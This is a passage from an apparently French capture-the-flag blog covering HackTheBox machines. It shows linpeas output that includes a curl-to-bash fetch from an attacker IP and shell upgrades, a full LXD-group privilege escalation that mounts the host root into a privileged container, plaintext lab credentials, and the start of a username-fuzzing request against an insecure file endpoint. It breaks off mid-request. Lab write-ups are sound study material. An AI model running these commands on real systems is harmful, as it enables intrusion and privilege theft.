<span class="m">7296</span> ? Ssl 11:11 0:00 /usr/lib/accountsservice/accounts-daemon </span></span><span class="line"><span class="cl">message+ <span class="m">848</span> 0.0 0.2 <span class="m">7512</span> <span class="m">4604</span> ? Ss 11:11 0:00 /usr/bin/dbus-daemon --system --address<span class="o">=</span>systemd: --nofork --nopidfile --systemd-activation --syslog-only </span></span><span class="line"><span class="cl"> └─<span class="o">(</span>Caps<span class="o">)</span> <span class="nv">0x0000000020000000</span><span class="o">=</span>cap_audit_write </span></span><span class="line"><span class="cl">root <span class="m">854</span> 0.0 0.1 <span class="m">81944</span> <span class="m">3748</span> ? Ssl 11:11 0:00 /usr/sbin/irqbalance --foreground </span></span><span class="line"><span class="cl">syslog <span class="m">856</span> 0.0 0.2 <span class="m">224324</span> <span class="m">5344</span> ? Ssl 11:11 0:00 /usr/sbin/rsyslogd -n -iNONE </span></span><span class="line"><span class="cl">root <span class="m">857</span> 0.0 1.6 <span class="m">926232</span> <span class="m">33124</span> ? Ssl 11:11 0:02 /usr/lib/snapd/snapd </span></span><span class="line"><span class="cl">root <span class="m">858</span> 0.0 0.3 <span class="m">16864</span> <span class="m">7808</span> ? Ss 11:11 0:00 /lib/systemd/systemd-logind </span></span><span class="line"><span class="cl">root <span class="m">895</span> 0.0 0.1 <span class="m">6812</span> <span class="m">2992</span> ? Ss 11:11 0:00 /usr/sbin/cron -f </span></span><span class="line"><span class="cl">daemon<span class="o">[</span>0m <span class="m">934</span> 0.0 0.1 <span class="m">3792</span> <span class="m">2280</span> ? Ss 11:11 0:00 /usr/sbin/atd -f </span></span><span class="line"><span class="cl">ash <span class="m">78178</span> 0.0 0.2 <span class="m">13896</span> <span class="m">5412</span> ? S 17:15 0:00 _ sshd: ash@pts/2 </span></span><span class="line"><span class="cl">ash <span class="m">78181</span> 0.0 0.2 <span class="m">8544</span> <span class="m">5464</span> pts/2 Ss+ 17:15 0:00 _ -bash </span></span><span class="line"><span class="cl">ash <span class="m">78265</span> 0.0 0.5 <span class="m">24760</span> <span class="m">11216</span> pts/2 S 17:18 0:00 _ curl http://10.10.14.21/linpeas.sh </span></span><span class="line"><span class="cl">ash <span class="m">78266</span> 0.6 0.2 <span class="m">9260</span> <span class="m">5984</span> pts/2 S 17:18 0:00 _ bash </span></span><span class="line"><span class="cl">ash <span class="m">81771</span> 0.0 0.1 <span class="m">9260</span> <span class="m">4068</span> pts/2 S 17:18 0:00 _ bash </span></span><span class="line"><span class="cl">ash <span class="m">81775</span> 0.0 0.1 <span class="m">9208</span> <span class="m">3636</span> pts/2 R 17:18 0:00 <span class="p">|</span> _ ps fauxwww </span></span><span class="line"><span class="cl">ash <span class="m">81773</span> 0.0 0.1 <span class="m">9260</span> <span class="m">2776</span> pts/2 R 17:18 0:00 _ bash </span></span><span class="line"><span class="cl">ash <span class="m">81774</span> 0.0 0.1 <span class="m">9260</span> <span class="m">2776</span> pts/2 S 17:18 0:00 _ bash </span></span><span class="line"><span class="cl">root <span class="m">956</span> 0.0 0.0 <span class="m">5828</span> <span class="m">1852</span> tty1 Ss+ 11:11 0:00 /sbin/agetty -o -p -- u --noclear tty1 linux </span></span><span class="line"><span class="cl">tomcat <span class="m">960</span> 0.1 8.6 <span class="m">3094604</span> <span class="m">175680</span> ? Ssl 11:11 0:38 /usr/lib/jvm/default-java/bin/java -Djava.util.logging.config.file<span class="o">=</span>/var/lib/tomcat9/conf/logging.properties -Djava.util.logging.manager<span class="o">=</span>org.apache.juli.ClassLoaderLogManager -Djava.awt.headless<span class="o">=</span><span class="nb">true</span> -Djdk.tls.ephemeralDHKeySize<span class="o">=</span><span class="m">2048</span> -Djava.protocol.handler.pkgs<span class="o">=</span>org.apache.catalina.webresources -Dorg.apache.catalina.security.SecurityListener.UMASK<span class="o">=</span><span class="m">0027</span> -Dignore.endorsed.dirs<span class="o">=</span> -classpath /usr/share/tomcat9/bin/bootstrap.jar:/usr/share/tomcat9/bin/tomcat-juli.jar -Dcatalina.base<span class="o">=</span>/var/lib/tomcat9 -Dcatalina.home<span class="o">=</span>/usr/share/tomcat9 -Djava.io.tmpdir<span class="o">=</span>/tmp org.apache.catalina.startup.Bootstrap start </span></span><span class="line"><span class="cl"> └─<span class="o">(</span>Caps<span class="o">)</span> <span class="nv">0x0000000000000400</span><span class="o">=</span>cap_net_bind_service </span></span><span class="line"><span class="cl">tomcat <span class="m">1399</span> 0.0 0.0 <span class="m">2608</span> <span class="m">600</span> ? S 11:17 0:00 _ /bin/sh </span></span><span class="line"><span class="cl"> └─<span class="o">(</span>Caps<span class="o">)</span> <span class="nv">0x0000000000000400</span><span class="o">=</span>cap_net_bind_service </span></span><span class="line"><span class="cl">tomcat <span class="m">1419</span> 0.0 0.4 <span class="m">15968</span> <span class="m">10104</span> ? S 11:18 0:00 <span class="p">|</span> _ python3 -c import pty<span class="p">;</span>pty.spawn<span class="o">(</span><span class="s2">&#34;/bin/bash&#34;</span><span class="o">)</span> </span></span><span class="line"><span class="cl"> └─<span class="o">(</span>Caps<span class="o">)</span> <span class="nv">0x0000000000000400</span><span class="o">=</span>cap_net_bind_service </span></span><span class="line"><span class="cl">tomcat <span class="m">1420</span> 0.0 0.2 <span class="m">8568</span> <span class="m">5608</span> pts/0 Ss+ 11:18 0:00 <span class="p">|</span> _ /bin/bash </span></span><span class="line"><span class="cl"> └─<span class="o">(</span>Caps<span class="o">)</span> <span class="nv">0x0000000000000400</span><span class="o">=</span>cap_net_bind_service </span></span><span class="line"><span class="cl">tomcat <span class="m">77260</span> 0.0 0.0 <span class="m">2608</span> <span class="m">608</span> ? S 16:55 0:00 _ /bin/sh </span></span><span class="line"><span class="cl"> └─<span class="o">(</span>Caps<span class="o">)</span> <span class="nv">0x0000000000000400</span><span class="o">=</span>cap_net_bind_service </span></span><span class="line"><span class="cl">tomcat <span class="m">77273</span> 0.0 0.4 <span class="m">15708</span> <span class="m">9796</span> ? S 16:55 0:00 _ python3 -c import pty<span class="p">;</span>pty.spawn<span class="o">(</span><span class="s1">&#39;/bin/bash&#39;</span><span class="o">)</span> </span></span><span class="line"><span class="cl"> └─<span class="o">(</span>Caps<span class="o">)</span> <span class="nv">0x0000000000000400</span><span class="o">=</span>cap_net_bind_service </span></span><span class="line"><span class="cl">tomcat <span class="m">77274</span> 0.0 0.2 <span class="m">8436</span> <span class="m">5452</span> pts/1 Ss 16:55 0:00 _ /bin/bash </span></span><span class="line"><span class="cl"> └─<span class="o">(</span>Caps<span class="o">)</span> <span class="nv">0x0000000000000400</span><span class="o">=</span>cap_net_bind_service </span></span><span class="line"><span class="cl">root <span class="m">77714</span> 0.0 0.2 <span class="m">8776</span> <span class="m">4196</span> pts/1 S 17:07 0:00 _ su ash </span></span><span class="line"><span class="cl">ash <span class="m">77738</span> 0.0 0.2 <span class="m">8312</span> <span class="m">5352</span> pts/1 S+ 17:07 0:00 _ bash </span></span><span class="line"><span class="cl">root <span class="m">973</span> 0.0 0.8 <span class="m">193420</span> <span class="m">17916</span> ? Ss 11:11 0:00 /usr/sbin/apache2 -k start </span></span><span class="line"><span class="cl">www-data <span class="m">990</span> 0.0 0.4 <span class="m">193888</span> <span class="m">9792</span> ? S 11:11 0:00 _ /usr/sbin/apache2 -k start </span></span><span class="line"><span class="cl">www-data <span class="m">993</span> 0.0 0.4 <span class="m">193872</span> <span class="m">9776</span> ? S 11:11 0:00 _ /usr/sbin/apache2 -k start </span></span><span class="line"><span class="cl">www-data <span class="m">1252</span> 0.0 0.6 <span class="m">193872</span> <span class="m">12308</span> ? S 11:12 0:00 _ /usr/sbin/apache2 -k start </span></span><span class="line"><span class="cl">www-data <span class="m">1254</span> 0.0 0.6 <span class="m">193888</span> <span class="m">13444</span> ? S 11:12 0:00 _ /usr/sbin/apache2 -k start </span></span><span class="line"><span class="cl">www-data <span class="m">1255</span> 0.0 0.4 <span class="m">193864</span> <span class="m">9740</span> ? S 11:12 0:00 _ /usr/sbin/apache2 -k start </span></span><span class="line"><span class="cl">www-data <span class="m">1256</span> 0.0 0.4 <span class="m">193872</span> <span class="m">9764</span> ? S 11:12 0:00 _ /usr/sbin/apache2 -k start </span></span><span class="line"><span class="cl">www-data <span class="m">1257</span> 0.0 0.4 <span class="m">193888</span> <span class="m">9788</span> ? S 11:12 0:00 _ /usr/sbin/apache2 -k start </span></span><span class="line"><span class="cl">www-data <span class="m">1258</span> 0.0 0.4 <span class="m">193888</span> <span class="m">9776</span> ? S 11:12 0:00 _ /usr/sbin/apache2 -k start </span></span><span class="line"><span class="cl">www-data <span class="m">35324</span> 0.0 0.4 <span class="m">193856</span> <span class="m">9632</span> ? S 11:39 0:00 _ /usr/sbin/apache2 -k start </span></span><span class="line"><span class="cl">www-data <span class="m">35326</span> 0.0 0.3 <span class="m">193824</span> <span class="m">7816</span> ? S 11:39 0:00 _ /usr/sbin/apache2 -k start </span></span><span class="line"><span class="cl">root <span class="m">983</span> 0.0 0.3 <span class="m">232700</span> <span class="m">6908</span> ? Ssl 11:11 0:00 /usr/lib/policykit-1/polkitd --no-debug </span></span><span class="line"><span class="cl">ash <span class="m">77728</span> 0.0 0.4 <span class="m">18672</span> <span class="m">10004</span> ? Ss 17:07 0:00 /lib/systemd/systemd --user </span></span><span class="line"><span class="cl">ash <span class="m">77732</span> 0.0 0.1 <span class="m">105464</span> <span class="m">3480</span> ? S 17:07 0:00 _ <span class="o">(</span>sd-pam<span class="o">)</span> </span></span><span class="line"><span class="cl">ash <span class="m">81372</span> 0.0 0.1 <span class="m">7084</span> <span class="m">3992</span> ? Ss 17:18 0:00 _ /usr/bin/dbus-daemon<span class="o">[</span>0m --session --address<span class="o">=</span>systemd: --nofork --nopidfile --systemd-activation --syslog-only </span></span><span class="line"><span class="cl">root <span class="m">81391</span> 0.3 0.0 <span class="m">2616</span> <span class="m">1936</span> ? Ss 17:18 0:00 /bin/sh /snap/lxd/21468/commands/daemon.start </span></span><span class="line"><span class="cl">root <span class="m">81570</span> 1.1 2.6 <span class="m">1458640</span> <span class="m">53604</span> ? Sl 17:18 0:00 _ lxd --logfile /var/snap/lxd/common/lxd/logs/lxd.log --group lxd </span></span><span class="line"><span class="cl">root <span class="m">81557</span> 0.0 0.0 <span class="m">85608</span> <span class="m">2016</span> ? Sl 17:18 0:00 lxcfs /var/snap/lxd/common/var/lib/lxcfs -p /var/snap/lxd/common/lxcfs.pid </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">╔══════════╣ Processes with credentials in memory <span class="o">(</span>root req<span class="o">)</span> </span></span><span class="line"><span class="cl">╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#credentials-from-process-memory </span></span><span class="line"><span class="cl">gdm-password Not Found </span></span><span class="line"><span class="cl">gnome-keyring-daemon Not Found </span></span><span class="line"><span class="cl">lightdm Not Found </span></span><span class="line"><span class="cl">vsftpd Not Found </span></span><span class="line"><span class="cl">apache2 process found <span class="o">(</span>dump creds from memory as root<span class="o">)</span> </span></span><span class="line"><span class="cl">sshd: process found <span class="o">(</span>dump creds from memory as root<span class="o">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">╔══════════╣ Processes whose PPID belongs to a different user <span class="o">(</span>not root<span class="o">)</span> </span></span><span class="line"><span class="cl">╚ You will know <span class="k">if</span> a user can somehow spawn processes as a different user </span></span><span class="line"><span class="cl">Proc <span class="m">77714</span> with ppid <span class="m">77274</span> is run by user root but the ppid user is tomcat </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">╔══════════╣ Files opened by processes belonging to other users </span></span><span class="line"><span class="cl">╚ This is usually empty because of the lack of privileges to <span class="nb">read</span> other user processes information </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">ash@tabby:~$ groups ash </span></span><span class="line"><span class="cl">ash : ash adm cdrom dip plugdev lxd </span></span></code></pre></td></tr></table> </div> </div><h3 id="lxd-group-privilege-escalation---root-flag">lxd group privilege escalation - root flag </h3><p>On trouve un tutoriel pour exploiter lxd : <a class="link" href="https://amanisher.medium.com/lxd-privilege-escalation-in-linux-lxd-group-ec7cafe7af63" target="_blank" rel="noopener" >https://amanisher.medium.com/lxd-privilege-escalation-in-linux-lxd-group-ec7cafe7af63</a> Ainsi qu&rsquo;un github avec le container à cloner sur la machine : <a class="link" href="https://github.com/saghul/lxd-alpine-builder" target="_blank" rel="noopener" >https://github.com/saghul/lxd-alpine-builder</a></p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span><span class="lnt">42 </span><span class="lnt">43 </span><span class="lnt">44 </span><span class="lnt">45 </span><span class="lnt">46 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">ash@tabby:~$ <span class="nb">cd</span> lxd-alpine-builder/ </span></span><span class="line"><span class="cl">ash@tabby:~/lxd-alpine-builder$ ls </span></span><span class="line"><span class="cl">alpine-v3.13-x86_64-20210218_0139.tar.gz </span></span><span class="line"><span class="cl">ash@tabby:~/lxd-alpine-builder$ lxc image import alpine-v3.13-x86_64-20210218_0139.tar.gz --alias myimage </span></span><span class="line"><span class="cl">Image imported with fingerprint: cd73881adaac667ca3529972c7b380af240a9e3b09730f8c8e4e6a23e1a7892b </span></span><span class="line"><span class="cl">ash@tabby:~/lxd-alpine-builder$ lxc image list </span></span><span class="line"><span class="cl">+---------+--------------+--------+-------------------------------+--------------+-----------+--------+-----------------------------+ </span></span><span class="line"><span class="cl"><span class="p">|</span> ALIAS <span class="p">|</span> FINGERPRINT <span class="p">|</span> PUBLIC <span class="p">|</span> DESCRIPTION <span class="p">|</span> ARCHITECTURE <span class="p">|</span> TYPE <span class="p">|</span> SIZE <span class="p">|</span> UPLOAD DATE <span class="p">|</span> </span></span><span class="line"><span class="cl">+---------+--------------+--------+-------------------------------+--------------+-----------+--------+-----------------------------+ </span></span><span class="line"><span class="cl"><span class="p">|</span> myimage <span class="p">|</span> cd73881adaac <span class="p">|</span> no <span class="p">|</span> alpine v3.13 <span class="o">(</span>20210218_01:39<span class="o">)</span> <span class="p">|</span> x86_64 <span class="p">|</span> CONTAINER <span class="p">|</span> 3.11MB <span class="p">|</span> May 5, <span class="m">2025</span> at 5:29pm <span class="o">(</span>UTC<span class="o">)</span> <span class="p">|</span> </span></span><span class="line"><span class="cl">+---------+--------------+--------+-------------------------------+--------------+-----------+--------+-----------------------------+ </span></span><span class="line"><span class="cl">ash@tabby:~/lxd-alpine-builder$ lxc init myimage ignite -c security.privileged<span class="o">=</span><span class="nb">true</span> </span></span><span class="line"><span class="cl">Creating ignite </span></span><span class="line"><span class="cl">Error: No storage pool found. Please create a new storage pool </span></span><span class="line"><span class="cl">ash@tabby:~/lxd-alpine-builder$ lxd init </span></span><span class="line"><span class="cl">Would you like to use LXD clustering? <span class="o">(</span>yes/no<span class="o">)</span> <span class="o">[</span><span class="nv">default</span><span class="o">=</span>no<span class="o">]</span>: </span></span><span class="line"><span class="cl">Do you want to configure a new storage pool? <span class="o">(</span>yes/no<span class="o">)</span> <span class="o">[</span><span class="nv">default</span><span class="o">=</span>yes<span class="o">]</span>: </span></span><span class="line"><span class="cl">Name of the new storage pool <span class="o">[</span><span class="nv">default</span><span class="o">=</span>default<span class="o">]</span>: </span></span><span class="line"><span class="cl">Name of the storage backend to use <span class="o">(</span>btrfs, dir, lvm, zfs, ceph<span class="o">)</span> <span class="o">[</span><span class="nv">default</span><span class="o">=</span>zfs<span class="o">]</span>: </span></span><span class="line"><span class="cl">Create a new ZFS pool? <span class="o">(</span>yes/no<span class="o">)</span> <span class="o">[</span><span class="nv">default</span><span class="o">=</span>yes<span class="o">]</span>: </span></span><span class="line"><span class="cl">Would you like to use an existing empty block device <span class="o">(</span>e.g. a disk or partition<span class="o">)</span>? <span class="o">(</span>yes/no<span class="o">)</span> <span class="o">[</span><span class="nv">default</span><span class="o">=</span>no<span class="o">]</span>: </span></span><span class="line"><span class="cl">Size in GB of the new loop device <span class="o">(</span>1GB minimum<span class="o">)</span> <span class="o">[</span><span class="nv">default</span><span class="o">=</span>5GB<span class="o">]</span>: </span></span><span class="line"><span class="cl">Would you like to connect to a MAAS server? <span class="o">(</span>yes/no<span class="o">)</span> <span class="o">[</span><span class="nv">default</span><span class="o">=</span>no<span class="o">]</span>: </span></span><span class="line"><span class="cl">Would you like to create a new <span class="nb">local</span> network bridge? <span class="o">(</span>yes/no<span class="o">)</span> <span class="o">[</span><span class="nv">default</span><span class="o">=</span>yes<span class="o">]</span>: </span></span><span class="line"><span class="cl">What should the new bridge be called? <span class="o">[</span><span class="nv">default</span><span class="o">=</span>lxdbr0<span class="o">]</span>: </span></span><span class="line"><span class="cl">What IPv4 address should be used? <span class="o">(</span>CIDR subnet notation, “auto” or “none”<span class="o">)</span> <span class="o">[</span><span class="nv">default</span><span class="o">=</span>auto<span class="o">]</span>: </span></span><span class="line"><span class="cl">What IPv6 address should be used? <span class="o">(</span>CIDR subnet notation, “auto” or “none”<span class="o">)</span> <span class="o">[</span><span class="nv">default</span><span class="o">=</span>auto<span class="o">]</span>: </span></span><span class="line"><span class="cl">Would you like the LXD server to be available over the network? <span class="o">(</span>yes/no<span class="o">)</span> <span class="o">[</span><span class="nv">default</span><span class="o">=</span>no<span class="o">]</span>: </span></span><span class="line"><span class="cl">Would you like stale cached images to be updated automatically? <span class="o">(</span>yes/no<span class="o">)</span> <span class="o">[</span><span class="nv">default</span><span class="o">=</span>yes<span class="o">]</span> </span></span><span class="line"><span class="cl">Would you like a YAML <span class="s2">&#34;lxd init&#34;</span> preseed to be printed? <span class="o">(</span>yes/no<span class="o">)</span> <span class="o">[</span><span class="nv">default</span><span class="o">=</span>no<span class="o">]</span>: </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">ash@tabby:~/lxd-alpine-builder$ lxc init myimage ignite -c security.privileged<span class="o">=</span><span class="nb">true</span> </span></span><span class="line"><span class="cl">Creating ignite </span></span><span class="line"><span class="cl">ash@tabby:~/lxd-alpine-builder$ lxc config device add ignite mydevice disk <span class="nv">source</span><span class="o">=</span>/ <span class="nv">path</span><span class="o">=</span>/mnt/root <span class="nv">recursive</span><span class="o">=</span><span class="nb">true</span> </span></span><span class="line"><span class="cl">Device mydevice added to ignite </span></span><span class="line"><span class="cl">ash@tabby:~/lxd-alpine-builder$ lxc start ignite </span></span><span class="line"><span class="cl">ash@tabby:~/lxd-alpine-builder$ lxc <span class="nb">exec</span> ignite /bin/sh </span></span><span class="line"><span class="cl">~ <span class="c1"># cd /mnt/root/</span> </span></span><span class="line"><span class="cl">/mnt/root <span class="c1"># ls</span> </span></span><span class="line"><span class="cl">bin cdrom etc lib lib64 lost+found mnt proc run snap sys usr </span></span><span class="line"><span class="cl">boot dev home lib32 libx32 media opt root sbin srv tmp var </span></span><span class="line"><span class="cl">/mnt/root <span class="c1"># cd root</span> </span></span><span class="line"><span class="cl">/mnt/root/root <span class="c1"># ls</span> </span></span><span class="line"><span class="cl">root.txt snap </span></span><span class="line"><span class="cl">/mnt/root/root <span class="c1"># cat root.txt </span> </span></span><span class="line"><span class="cl">47a3.....74a4 </span></span></code></pre></td></tr></table> </div> </div><h2 id="tips">Tips </h2><ul> <li>J&rsquo;aurais dû mieux comprendre les roles et leur fonctionnement. Le role <strong>manager-script</strong> permet uniquement d&rsquo;utiliser l&rsquo;API de tomcat. J&rsquo;aurais dû axé mes recherches sur les droits hérités de ce rôle pour mieux comprendre comment upload un reverse shell.</li> </ul>https://leopoldabgn.github.io/writeups/p/nocturnal-htb/Wed, 16 Apr 2025 00:00:00 +0000https://leopoldabgn.github.io/writeups/p/nocturnal-htb/<table style="border:none; width:100%;"> <tr> <!-- Colonne gauche : logo --> <td style="border:none; text-align:center; vertical-align:middle; width:150px;"> <img src="cover.png" alt="Nocturnal cover" width="120"> </td> <td style="border:none; text-align:center; vertical-align:middle;"> <table style="margin:auto; border-collapse:collapse; border:1px solid #ddd;"> <thead> <tr> <th style="padding:8px; border:1px solid #ddd; text-align:center;">Machine name</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">OS</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">IP</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">Difficulty</th> </tr> </thead> <tbody> <tr> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Nocturnal</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Linux</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">10.10.11.64</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Easy</td> </tr> </tbody> </table> </td> </tr> </table> <h2 id="users">Users </h2><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">amanda : arHkG7HAI68X8s1J </span></span><span class="line"><span class="cl">tobias : slowmotionapocalypse </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="c1">## ISPConfig Dashboard</span> </span></span><span class="line"><span class="cl">admin : slowmotionapocalypse </span></span></code></pre></td></tr></table> </div> </div><h2 id="systeminfo">SystemInfo </h2><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">Ubuntu 20.04.6 LTS <span class="o">(</span>Focal Fossa<span class="o">)</span> </span></span></code></pre></td></tr></table> </div> </div><h2 id="enumeration">Enumeration </h2><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ nmap -sC -sV -An -p- -vvv -T4 10.10.11.64 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">PORT STATE SERVICE REASON VERSION </span></span><span class="line"><span class="cl">22/tcp open ssh syn-ack ttl <span class="m">63</span> OpenSSH 8.2p1 Ubuntu 4ubuntu0.12 <span class="o">(</span>Ubuntu Linux<span class="p">;</span> protocol 2.0<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> ssh-hostkey: </span></span><span class="line"><span class="cl"><span class="p">|</span> <span class="m">3072</span> 20:26:88:70:08:51:ee:de:3a:a6:20:41:87:96:25:17 <span class="o">(</span>RSA<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDpf3JJv7Vr55+A/O4p/l+TRCtst7lttqsZHEA42U5Edkqx/Kb8c+F0A4wMCVOMqwyR/PaMdmzAomYGvNYhi3NelwIEqdKKnL+5svrsStqb9XjyShPD9SQK5Su7xBt+/TfJyJFRcsl7ZJdfc6xnNHQITvwa6uZhLsicycj0yf1Mwdzy9hsc8KRY2fhzARBaPUFdG0xte2MkaGXCBuI0tMHsqJpkeZ46MQJbH5oh4zqg2J8KW+m1suAC5toA9kaLgRis8p/wSiLYtsfYyLkOt2U+E+FZs4i3vhVxb9Sjl9QuuhKaGKQN2aKc8ItrK8dxpUbXfHr1Y48HtUejBj+AleMrUMBXQtjzWheSe/dKeZyq8EuCAzeEKdKs4C7ZJITVxEe8toy7jRmBrsDe4oYcQU2J76cvNZomU9VlRv/lkxO6+158WtxqHGTzvaGIZXijIWj62ZrgTS6IpdjP3Yx7KX6bCxpZQ3+jyYN1IdppOzDYRGMjhq5ybD4eI437q6CSL20<span class="o">=</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> <span class="m">256</span> 4f:80:05:33:a6:d4:22:64:e9:ed:14:e3:12:bc:96:f1 <span class="o">(</span>ECDSA<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBLcnMmaOpYYv5IoOYfwkaYqI9hP6MhgXCT9Cld1XLFLBhT+9SsJEpV6Ecv+d3A1mEOoFL4sbJlvrt2v5VoHcf4M<span class="o">=</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> <span class="m">256</span> d9:88:1f:68:43:8e:d4:2a:52:fc:f0:66:d4:b9:ee:6b <span class="o">(</span>ED25519<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span>_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIASsDOOb+I4J4vIK5Kz0oHmXjwRJMHNJjXKXKsW0z/dy </span></span><span class="line"><span class="cl">80/tcp open http syn-ack ttl <span class="m">63</span> nginx 1.18.0 <span class="o">(</span>Ubuntu<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span>_http-title: Did not follow redirect to http://nocturnal.htb/ </span></span><span class="line"><span class="cl"><span class="p">|</span> http-methods: </span></span><span class="line"><span class="cl"><span class="p">|</span>_ Supported Methods: GET HEAD POST OPTIONS </span></span><span class="line"><span class="cl"><span class="p">|</span>_http-server-header: nginx/1.18.0 <span class="o">(</span>Ubuntu<span class="o">)</span> </span></span></code></pre></td></tr></table> </div> </div><h2 id="foothold">Foothold </h2><h3 id="file-upload">File upload </h3><p>On trouve un site web, on peut s&rsquo;inscrire et poster des fichiers. Avec beaucoup de recherche, je ne trouve pas de faille pour uploader un shell par exemple et executer du code php. Rien ne semble vulnérable.</p> <p>En téléchargeant mes propres fichiers, et en analysant la requete effectué avec Burp. Je découvre qu&rsquo;il est possible de vérifier si un utilisateur existe ou non. En plus, si il existe, et qu&rsquo;on précise un mauvais fichier pour l&rsquo;upload, il nous propose les autres fichiers disponibles pour cet utilisateur !</p> <p>Dans un premier et j&rsquo;ai fait une requete Burp. Lorsqu&rsquo;un utilisateur est mauvais, j&rsquo;ai vu que la taille de la requete était de <strong>2985</strong>octets. Information importante pour pouvoir fuzzer ensuite les usernames. En effet, si la reponse a ma requete est différente de cette taille, alors il est probable que l&rsquo;utilisateur existe.</p> <p>Je mets la requete a effectué pour fuzzer les noms d&rsquo;utilisateur, avec le mot clé &ldquo;FUZZ&rdquo; au bon endroit :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">~/github/Hacking/HackTheBox/Machines/Linux/Easy/Nocturnal <span class="o">(</span>main*<span class="o">)</span> » cat dl.req </span></span><span class="line"><span class="cl">GET /view.php?username<span class="o">=</span>FUZZ<span class="p">&amp;</span><span class="nv">file</span><span class="o">=</span>a.pdf HTTP/1.1 </span></span><span class="line"><span class="cl">Host: nocturnal.htb </span></span><span class="line"><span class="cl">User-Agent: Mozilla/5.0 <span class="o">(</span>X11<span class="p">;</span> Linux x86_64<span class="p">;</span> rv:128.0<span class="o">)</span> Gecko/20100101 Firefox/128.0 </span></span><span class="line"><span class="cl">Accept: text/html,application/xhtml+xml,application/xml<span class="p">;</span><span class="nv">q</span><span class="o">=</span>0.9,*/*<span class="p">;</span><span class="nv">q</span><span class="o">=</span>0.8 </span></span><span class="line"><span class="cl">Accept-Language: fr,fr-FR<span class="p">;</span><span class="nv">q</span><span class="o">=</span>0.8,en-US<span class="p">;</span><span class="nv">q</span><span class="o">=</span>0.5,en<span class="p">;</span><span class="nv">q</span><span class="o">=</span>0.3 </span></span><span class="line"><span class="cl">Accept-Encoding: gzip, deflate, br </span></span><span class="line"><span class="cl">Connection: keep-alive </span></span><span class="line"><span class="cl">Referer: http://nocturnal.htb/dashboard.php </span></span><span class="line"><span class="cl">Cookie: 